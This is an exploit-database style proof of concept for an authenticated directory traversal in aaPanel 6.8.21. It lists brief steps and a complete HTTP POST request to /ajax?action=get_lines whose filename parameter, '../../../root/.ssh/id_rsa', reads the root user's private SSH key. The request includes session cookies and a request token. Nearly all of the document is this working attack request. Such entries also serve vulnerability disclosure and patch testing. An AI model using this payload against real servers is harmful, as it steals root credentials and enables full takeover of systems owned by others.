aaPanel 6.8.21 - Directory Traversal (Authenticated)

# Exploit Title: aaPanel 6.8.21 - Directory Traversal (Authenticated)
# Date: 22.02.2022
# Exploit Author: Fikrat Ghuliev (Ghuliev)
# Vendor Homepage: https://www.aapanel.com/
# Software Link: https://www.aapanel.com
# Version: 6.8.21
# Tested on: Ubuntu

Application vulnerable to Directory Traversal and attacker can get root user private ssh key(id_rsa)

#Go to App Store

#Click to "install" in any free plugin.

#Change installation script to ../../../root/.ssh/id_rsa

POST /ajax?action=get_lines HTTP/1.1
Host: IP:7800
Content-Length: 41
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82
Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://IP:7800
Referer: http://IP:7800/soft
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: aa0775f98350c5c13bfd21f2c6b8c288=d20c4937-e5ae-46fb-b8bd-fa7c290d805a.ohyRHdOIMj3DBfyddCRbL-rlKB0;
request_token=nKLXa4RUXgwBHeWNyMH1MEDSkTaks9dWjQ7zzA0iRc7lrHwd;
serverType=nginx; order=id%20desc; memSize=3889; vcodesum=13;
page_number=20; backup_path=/www/backup; sites_path=/www/wwwroot;
distribution=ubuntu; serial_no=; pro_end=-1; load_page=null;
load_type=null; load_search=undefined; force=0; rank=list;
Path=/www/wwwroot; bt_user_info=; default_dir_path=/www/wwwroot/;
path_dir_change=/www/wwwroot/
Connection: close

num=10&filename=../../../root/.ssh/id_rsa